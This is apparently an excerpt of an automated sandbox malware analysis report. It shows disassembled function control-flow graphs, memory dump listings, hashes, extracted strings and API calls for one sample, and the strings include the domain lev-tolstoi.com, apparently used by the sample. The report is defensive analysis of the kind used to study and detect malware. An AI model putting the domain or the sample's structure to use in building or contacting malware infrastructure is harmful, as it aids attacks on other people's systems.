                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
                                                                                                                                                                                                                                                • API String ID: 0-620192811
                                                                                                                                                                                                                                                • Opcode ID: e575d4eb02ba4e7e01793bad6ad48515b2f4bb9a24785dc20eb76c5660b8ba03
                                                                                                                                                                                                                                                • Instruction ID: 8a26633eabb5df57d9969f88e19daf18e8a724222392a8a92b7bdceb4741e268
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e575d4eb02ba4e7e01793bad6ad48515b2f4bb9a24785dc20eb76c5660b8ba03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E20253B1610B41CFD724CF25E891B9BBBF1BB49314F048A2CD5AB8BAA1DB34A445CF50
                                                                                                                                                                                                                                                Function 00AB1227 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 750COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 862 ab1227-ab123f 863 ab1241-ab1244 862->863 864 ab1280-ab12ae call aa1870 863->864 865 ab1246-ab127e 863->865 868 ab12b0-ab12b3 864->868 865->863 869 ab12fd-ab1327 call aa1870 868->869 870 ab12b5-ab12fb 868->870 873 ab132b-ab132f 869->873 874 ab1329-ab1364 call ab4850 869->874 870->868 876 ab1d26 873->876 882 ab1368-ab13a9 call aa7f50 call aaa8d0 874->882 883 ab1366 874->883 877 ab2715 876->877 879 ab2717-ab2733 call aa1f30 877->879 889 aaf450-ab2744 879->889 890 aaf457-aaf487 call aa1f40 879->890 894 ab13ab-ab13ae 882->894 883->882 898 aaf489-aaf48c 890->898 896 ab13fa-ab141e call aa1870 894->896 897 ab13b0-ab13f8 894->897 905 ab1420-ab1459 call ab4850 896->905 906 ab1486-ab14b6 call ab4850 896->906 897->894 899 aaf48e-aaf4ca 898->899 900 aaf4cc-aaf51a call aa1e30 898->900 899->898 908 aaf51e-aaf522 900->908 909 aaf51c-aaf545 900->909 916 ab145b 905->916 917 ab145d-ab1481 call aa7f50 call aaa8d0 905->917 914 ab14ba-ab155f call aa7f50 call aaa8d0 RtlExpandEnvironmentStrings 906->914 915 ab14b8 906->915 908->879 918 aaf549-aaf54c 909->918 931 ab1562-ab1565 914->931 915->914 916->917 917->906 921 aaf54e-aaf5ab 918->921 922 aaf5ad-aaf5fe call aa1970 918->922 921->918 922->877 929 aaf604 922->929 929->877 932 ab156b-ab15fa 931->932 933 ab15ff-ab1615 931->933 932->931 934 ab162d-ab1646 933->934 935 ab1617-ab1628 call aa7f60 933->935 936 ab164a-ab16ac call aa7f50 934->936 937 ab1648 934->937 935->876 944 ab16db-ab1704 call aa7f60 936->944 945 ab16ae-ab16d6 call aa7f60 * 2 936->945 937->936 952 ab1706-ab1709 944->952 967 ab1d24 945->967 954 ab170b-ab173d 952->954 955 ab173f-ab175a call aa1870 952->955 954->952 962 ab175c-ab1788 call ab4850 955->962 963 ab17b6-ab17d7 955->963 972 ab178a 962->972 973 ab178c-ab17b4 call aa7f50 call aaa8d0 962->973 965 ab17da-ab17dd 963->965 968 ab1818-ab185e call aa1b80 965->968 969 ab17df-ab1816 965->969 967->876 977 ab1860-ab1863 968->977 969->965 972->973 973->963 979 ab18b8-ab18e5 call aa1a80 977->979 980 ab1865-ab18b6 977->980 984 ab18ec-ab1930 call aa1f30 979->984 985 ab18e7 979->985 980->977 990 ab1932 984->990 991 ab1934-ab194d call aa7f50 984->991 986 ab1bf1-ab1c75 call aa8b60 call ab57c0 985->986 996 ab1c7a-ab1c89 call aa9780 986->996 990->991 997 ab196f-ab1975 991->997 998 ab194f-ab1956 991->998 1003 ab1c8b-ab1c9a 996->1003 1004 ab1cc7-ab1cfa call aa7f60 * 2 996->1004 1001 ab1977-ab1979 997->1001 1000 ab1958-ab1964 call ab4980 998->1000 1017 ab1966-ab196d 1000->1017 1006 ab197b-ab197f 1001->1006 1007 ab1984-ab19c4 call aa1f40 1001->1007 1008 ab1c9c 1003->1008 1009 ab1cb5-ab1cc5 call aa7f60 1003->1009 1037 ab1cfc-ab1cff call aa7f60 1004->1037 1038 ab1d04-ab1d0e 1004->1038 1006->986 1019 ab19c6-ab19c9 1007->1019 1013 ab1c9e-ab1caf call ab4b10 1008->1013 1009->1004 1026 ab1cb3 1013->1026 1027 ab1cb1 1013->1027 1017->997 1023 ab19cb-ab1a0c 1019->1023 1024 ab1a0e-ab1a55 call aa1870 1019->1024 1023->1019 1033 ab1a57-ab1a5a 1024->1033 1026->1009 1027->1013 1035 ab1a79-ab1ac8 call aa1870 1033->1035 1036 ab1a5c-ab1a77 1033->1036 1046 ab1aca-ab1acd 1035->1046 1036->1033 1037->1038 1041 ab1d18-ab1d1f call aa8c40 1038->1041 1042 ab1d10-ab1d13 call aa7f60 1038->1042 1041->967 1042->1041 1047 ab1acf-ab1af4 1046->1047 1048 ab1af6-ab1b48 call aa1b80 1046->1048 1047->1046 1051 ab1b4a-ab1b4d 1048->1051 1052 ab1b4f-ab1b7a 1051->1052 1053 ab1b7c-ab1bec call aa1b80 call ab49a0 1051->1053 1052->1051 1053->1001
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: )$+$>$@$F$L$[$`
                                                                                                                                                                                                                                                • API String ID: 0-4163809010
                                                                                                                                                                                                                                                • Opcode ID: b3514e9d49e8b5d826824c000c9203012aafe25fa6f0dead2d2fb6fe74676c45
                                                                                                                                                                                                                                                • Instruction ID: bf3133c7c1cb963ebdebccc878a5a54e8bd99a242d13d5a2f9fb424ebb45a8e3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3514e9d49e8b5d826824c000c9203012aafe25fa6f0dead2d2fb6fe74676c45
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A52807260C7808FD3249B38C5A53EFBBE5AB96320F594A2ED4D9C73C2D67489458B43
                                                                                                                                                                                                                                                Function 00AD8EA0 Relevance: 15.3, Strings: 12, Instructions: 287COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1058 ad8ea0-ad8ec3 1059 ad8ec5-ad8ec8 1058->1059 1060 ad8eca-ad8f2e 1059->1060 1061 ad8f30-ad8f50 1059->1061 1060->1059 1062 ad8f52-ad8f55 1061->1062 1063 ad8f57-ad8fb4 1062->1063 1064 ad8fb6-ad8fba 1062->1064 1063->1062 1065 ad8fbc-ad8fc7 1064->1065 1066 ad8fc9 1065->1066 1067 ad8fcb-ad8fe4 1065->1067 1068 ad9036-ad9039 1066->1068 1069 ad8fe8-ad8ff3 1067->1069 1070 ad8fe6 1067->1070 1073 ad903d-ad9042 1068->1073 1074 ad903b 1068->1074 1071 ad9028-ad902d 1069->1071 1072 ad8ff5-ad9023 call ade110 1069->1072 1070->1071 1076 ad902f 1071->1076 1077 ad9031-ad9034 1071->1077 1072->1071 1078 ad9048-ad9068 1073->1078 1079 ad9264-ad9271 1073->1079 1074->1073 1076->1068 1077->1065 1081 ad906a-ad906d 1078->1081 1082 ad906f-ad90cc 1081->1082 1083 ad90ce-ad90d2 1081->1083 1082->1081 1084 ad90d4-ad90df 1083->1084 1085 ad90e1 1084->1085 1086 ad90e3-ad90fc 1084->1086 1087 ad9160-ad9163 1085->1087 1088 ad90fe 1086->1088 1089 ad9100-ad910b 1086->1089 1092 ad9165 1087->1092 1093 ad9167-ad9171 1087->1093 1090 ad914f-ad9154 1088->1090 1089->1090 1091 ad910d-ad9145 call ade110 1089->1091 1095 ad9158-ad915b 1090->1095 1096 ad9156 1090->1096 1100 ad914a 1091->1100 1092->1093 1097 ad9175-ad917d 1093->1097 1098 ad9173 1093->1098 1095->1084 1096->1087 1099 ad9180-ad91a0 1097->1099 1098->1099 1101 ad91a2-ad91a5 1099->1101 1100->1090 1102 ad91a7-ad9200 1101->1102 1103 ad9202-ad9206 1101->1103 1102->1101 1104 ad9208-ad920e 1103->1104 1105 ad9210 1104->1105 1106 ad9212-ad9224 1104->1106 1107 ad9262 1105->1107 1108 ad9228-ad922e 1106->1108 1109 ad9226 1106->1109 1107->1079 1110 ad9256-ad9259 1108->1110 1111 ad9230-ad9252 call ade110 1108->1111 1109->1110 1113 ad925d-ad9260 1110->1113 1114 ad925b 1110->1114 1111->1110 1113->1104 1114->1107
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: \$\$\$]$]$]$^$^$^$_$_$_
                                                                                                                                                                                                                                                • API String ID: 0-1108506012
                                                                                                                                                                                                                                                • Opcode ID: f7836d44ed001f8fe6587c389981be554868c7b2fe035f5fa546d3cbe565801a
                                                                                                                                                                                                                                                • Instruction ID: 6fc1e2dc0d2207b0a3b56aa8ff52b3c5093d359b3943eb9e808e071c6e9144b9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7836d44ed001f8fe6587c389981be554868c7b2fe035f5fa546d3cbe565801a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31B1087164C7818BD3148B68CC8436BBFD297D6324F1D4B2EE5EA473C2C6B9C8858746
                                                                                                                                                                                                                                                Function 00AC39B9 Relevance: 13.1, APIs: 2, Strings: 5, Instructions: 822COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1116 ac39b9-ac39ce 1117 ac39ef-ac39ff 1116->1117 1118 ac374a-ac375f 1116->1118 1119 ac3a06-ac3a14 1116->1119 1120 ac3a37-ac3a51 1116->1120 1121 ac3990-ac399c 1116->1121 1122 ac39e0-ac39e8 1116->1122 1123 ac3a20 1116->1123 1124 ac3a22-ac3a30 1116->1124 1117->1118 1117->1119 1117->1120 1117->1122 1117->1123 1117->1124 1125 ac392c-ac3940 1118->1125 1126 ac3919-ac3925 1118->1126 1127 ac396a-ac3979 1118->1127 1128 ac37b4-ac37bc 1118->1128 1129 ac37c4-ac37cc 1118->1129 1130 ac3785-ac37ad 1118->1130 1131 ac37e0-ac37f0 1118->1131 1132 ac3770-ac377e 1118->1132 1133 ac37f2-ac37f9 1118->1133 1119->1123 1120->1117 1120->1118 1120->1119 1120->1120 1120->1121 1120->1122 1120->1123 1120->1124 1134 ac3a58-ac3a5f 1120->1134 1121->1116 1122->1117 1122->1118 1122->1119 1122->1120 1122->1121 1122->1122 1122->1123 1122->1124 1124->1118 1124->1120 1124->1122 1125->1127 1125->1134 1135 ac3a68-ac3a72 1125->1135 1136 ac3cd8-ac3ce1 1125->1136 1137 ac3ccb-ac3cd5 call aa7f60 1125->1137 1138 ac3c85-ac3cbc call aa7f50 RtlExpandEnvironmentStrings 1125->1138 1139 ac3a77-ac3a8a 1125->1139 1140 ac3980 1125->1140 1141 ac3b50-ac3bd2 1125->1141 1142 ac3ce2-ac3d2f call aa7f50 1125->1142 1143 ac3cc3 1125->1143 1145 ac3950-ac3963 1125->1145 1126->1125 1126->1127 1126->1128 1126->1129 1126->1131 1126->1133 1127->1134 1127->1135 1127->1136 1127->1137 1127->1138 1127->1139 1127->1140 1127->1141 1127->1142 1127->1143 1128->1129 1129->1131 1130->1128 1130->1129 1130->1131 1130->1133 1131->1133 1132->1125 1132->1126 1132->1127 1132->1128 1132->1129 1132->1130 1132->1131 1132->1133 1133->1132 1146 ac384e-ac385b 1133->1146 1147 ac3800-ac3834 1133->1147 1148 ac38c0-ac38c5 1133->1148 1149 ac38d0 1133->1149 1150 ac3840-ac3842 1133->1150 1134->1135 1166 ac3406-ac3412 1135->1166 1137->1136 1138->1136 1138->1137 1138->1142 1138->1143 1177 ac3e0c-ac3eba call aa7f50 1138->1177 1178 ac3dfe-ac3e03 1138->1178 1179 ac3f79 1138->1179 1180 ac3f69-ac3f71 1138->1180 1181 ac3f9a-ac4035 1138->1181 1139->1166 1140->1121 1153 ac3be0-ac3c0c 1141->1153 1174 ac3d30-ac3d83 1142->1174 1143->1137 1145->1127 1145->1134 1145->1135 1145->1136 1145->1137 1145->1138 1145->1139 1145->1140 1145->1141 1145->1142 1145->1143 1152 ac3860-ac387a 1146->1152 1147->1150 1148->1149 1149->1126 1150->1146 1152->1152 1161 ac387c-ac3883 1152->1161 1153->1153 1162 ac3c0e-ac3c4f RtlExpandEnvironmentStrings 1153->1162 1161->1132 1167 ac3889-ac3898 1161->1167 1168 ac3c50-ac3c73 1162->1168 1171 ac38a0-ac38a7 1167->1171 1168->1168 1172 ac3c75-ac3c7e 1168->1172 1175 ac38a9-ac38ac 1171->1175 1176 ac38d2-ac38d8 1171->1176 1172->1136 1172->1137 1172->1138 1172->1142 1172->1143 1172->1177 1172->1178 1172->1179 1172->1180 1172->1181 1174->1174 1182 ac3d85-ac3d8e 1174->1182 1175->1171 1186 ac38ae 1175->1186 1176->1132 1183 ac38de-ac3912 call ade110 1176->1183 1206 ac3ec0-ac3ee5 1177->1206 1178->1177 1187 ac3f7f-ac3f8b call aa7f60 1179->1187 1180->1179 1184 ac4040-ac40ce 1181->1184 1188 ac3d90-ac3d96 1182->1188 1189 ac3db1-ac3dc5 1182->1189 1183->1125 1183->1126 1183->1127 1183->1128 1183->1129 1183->1130 1183->1131 1183->1133 1184->1184 1191 ac40d4-ac40dd 1184->1191 1186->1132 1207 ac3f94 1187->1207 1194 ac3da0-ac3daf 1188->1194 1195 ac3dc7-ac3dca 1189->1195 1196 ac3de1-ac3dea call ae14b0 1189->1196 1198 ac40e0 call ac1d00 1191->1198 1194->1189 1194->1194 1201 ac3dd0-ac3ddf 1195->1201 1205 ac3def-ac3df7 1196->1205 1203 ac40e5-ac40ea 1198->1203 1201->1196 1201->1201 1208 ac40f3-ac410f 1203->1208 1205->1177 1205->1178 1205->1179 1205->1180 1205->1181 1205->1187 1205->1208 1206->1206 1209 ac3ee7-ac3ef0 1206->1209 1207->1181 1210 ac4110-ac415b 1208->1210 1211 ac3f11-ac3f1f 1209->1211 1212 ac3ef2-ac3efa 1209->1212 1210->1210 1213 ac415d-ac41ce 1210->1213 1215 ac3f41-ac3f62 call ae14b0 1211->1215 1216 ac3f21-ac3f24 1211->1216 1214 ac3f00-ac3f0f 1212->1214 1217 ac41d0-ac427b 1213->1217 1214->1211 1214->1214 1215->1136 1215->1137 1215->1179 1215->1180 1215->1187 1215->1207 1215->1208 1225 ac42ad-ac42b9 call aa7f60 1215->1225 1226 ac42a7 1215->1226 1218 ac3f30-ac3f3f 1216->1218 1217->1217 1220 ac4281-ac429e call ac1b60 1217->1220 1218->1215 1218->1218 1220->1226 1226->1225
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: +A#C=]=_$=]=_$_^]\$eN$rp
                                                                                                                                                                                                                                                • API String ID: 0-2225558837
                                                                                                                                                                                                                                                • Opcode ID: b5986f5cf4170d1f090b97dbedaba9a6347faa8a7225560b8aefb2657ffdbd10
                                                                                                                                                                                                                                                • Instruction ID: df41cb088bee0f105e236b0ba297a2fca790f1f72daa34d075f08f81490aa5df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5986f5cf4170d1f090b97dbedaba9a6347faa8a7225560b8aefb2657ffdbd10
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E34227B6A04201CFDB14CF68C891BAAB7B2FF89310F1A86ACD4459F395D734D942CB91
                                                                                                                                                                                                                                                Function 00AACE45 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 342COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1229 aace45-aace78 call ad3fd0 call aa9780 CoUninitialize 1234 aace80-aacee4 1229->1234 1234->1234 1235 aacee6-aacef7 1234->1235 1236 aacf00-aacf20 1235->1236 1236->1236 1237 aacf22-aacf64 1236->1237 1238 aacf70-aacf92 1237->1238 1238->1238 1239 aacf94-aacf9c 1238->1239 1240 aacfbb-aacfc3 1239->1240 1241 aacf9e-aacfa2 1239->1241 1243 aacfdb-aacfe6 1240->1243 1244 aacfc5-aacfc6 1240->1244 1242 aacfb0-aacfb9 1241->1242 1242->1240 1242->1242 1246 aad08a 1243->1246 1247 aacfec-aacfed 1243->1247 1245 aacfd0-aacfd9 1244->1245 1245->1243 1245->1245 1249 aad08d-aad095 1246->1249 1248 aacff0-aacff9 1247->1248 1248->1248 1250 aacffb 1248->1250 1251 aad0ad 1249->1251 1252 aad097-aad09b 1249->1252 1250->1249 1254 aad0b0-aad0bb 1251->1254 1253 aad0a0-aad0a9 1252->1253 1253->1253 1255 aad0ab 1253->1255 1256 aad0cb-aad0d7 1254->1256 1257 aad0bd-aad0bf 1254->1257 1255->1254 1259 aad0d9-aad0db 1256->1259 1260 aad0f1-aad1b1 1256->1260 1258 aad0c0-aad0c9 1257->1258 1258->1256 1258->1258 1261 aad0e0-aad0ed 1259->1261 1262 aad1c0-aad1d2 1260->1262 1261->1261 1263 aad0ef 1261->1263 1262->1262 1264 aad1d4-aad1f4 1262->1264 1263->1260 1265 aad200-aad252 1264->1265 1265->1265 1266 aad254-aad26b call aab7e0 1265->1266 1268 aad270-aad28a 1266->1268
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Uninitialize
                                                                                                                                                                                                                                                • String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
                                                                                                                                                                                                                                                • API String ID: 3861434553-1386727196
                                                                                                                                                                                                                                                • Opcode ID: 6c4438b006d8e9dc09d3c6717df58a53703dcfe617533f38a8c56e0be19cb1ae
                                                                                                                                                                                                                                                • Instruction ID: 8a7ceff7f9fdc9465ad23236c5dae4c069eeef13f61b57cd700631bfe464f2dd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c4438b006d8e9dc09d3c6717df58a53703dcfe617533f38a8c56e0be19cb1ae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63A102B42047818FD716CF29C4D0666BBE2FF97314B18859CC4D24F7AAD736A846CB51
                                                                                                                                                                                                                                                Function 00AA8600 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 356COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1274 aa8600-aa8611 call add9a0 1277 aa8a48-aa8a4f ExitProcess 1274->1277 1278 aa8617-aa861e call ad62a0 1274->1278 1281 aa8a31-aa8a38 1278->1281 1282 aa8624-aa864a 1278->1282 1283 aa8a3a-aa8a40 call aa7f60 1281->1283 1284 aa8a43 call ade080 1281->1284 1290 aa864c-aa864e 1282->1290 1291 aa8650-aa887f 1282->1291 1283->1284 1284->1277 1290->1291 1293 aa8880-aa88ce 1291->1293 1293->1293 1294 aa88d0-aa891d call adc540 1293->1294 1297 aa8920-aa8943 1294->1297 1298 aa8964-aa897c 1297->1298 1299 aa8945-aa8962 1297->1299 1301 aa8a0d-aa8a25 call aa9d00 1298->1301 1302 aa8982-aa8a0b 1298->1302 1299->1297 1301->1281 1305 aa8a27 call aacb90 1301->1305 1302->1301 1307 aa8a2c call aab7b0 1305->1307 1307->1281
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 00AA8A4A
                                                                                                                                                                                                                                                  • Part of subcall function 00AAB7B0: FreeLibrary.KERNEL32(00AA8A31), ref: 00AAB7B6
